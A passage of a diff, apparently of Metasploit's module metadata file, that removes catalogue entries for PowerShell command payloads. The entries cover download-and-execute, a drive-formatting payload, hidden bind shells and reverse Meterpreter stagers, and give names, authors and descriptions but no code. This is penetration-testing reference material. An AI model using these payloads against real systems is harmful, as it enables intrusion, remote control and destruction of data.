"2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dns_txt_query_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dns_txt_query_exec", - "staged": false - }, - "payload_cmd/windows/powershell/download_exec": { - "name": "Powershell Exec, Windows Executable Download (http,https,ftp) and Execute", - "fullname": "payload/cmd/windows/powershell/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/download_exec", - "staged": false - }, - "payload_cmd/windows/powershell/exec": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/exec", - "staged": false - }, - "payload_cmd/windows/powershell/format_all_drives": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/format_all_drives", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ashfaq Ansari ", - "Ruei-Min Jiang " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", - "URL-https://github.com/hacksysteam/ShellcodeOfDeath" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/format_all_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ShellcodeOfDeath" - ] - }, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/format_all_drives", - "staged": false - }, - "payload_cmd/windows/powershell/generic/debug_trap": { - "name": "Powershell Exec, Generic x86 Debug Trap", - "fullname": "payload/cmd/windows/powershell/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "robert " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/windows/powershell/generic/tight_loop": { - "name": "Powershell Exec, Generic x86 Tight Loop", - "fullname": "payload/cmd/windows/powershell/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jduck " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/windows/powershell/loadlibrary": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/loadlibrary", - "staged": false - }, - "payload_cmd/windows/powershell/messagebox": { - "name": "Powershell Exec, Windows MessageBox", - "fullname": "payload/cmd/windows/powershell/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r ", - "jduck " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/messagebox", - "staged": false - }, - "payload_cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/meterpreter/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/find_tag", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_https": { - "name": "Powershell Exec, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_https" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_named_pipe": { - "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": 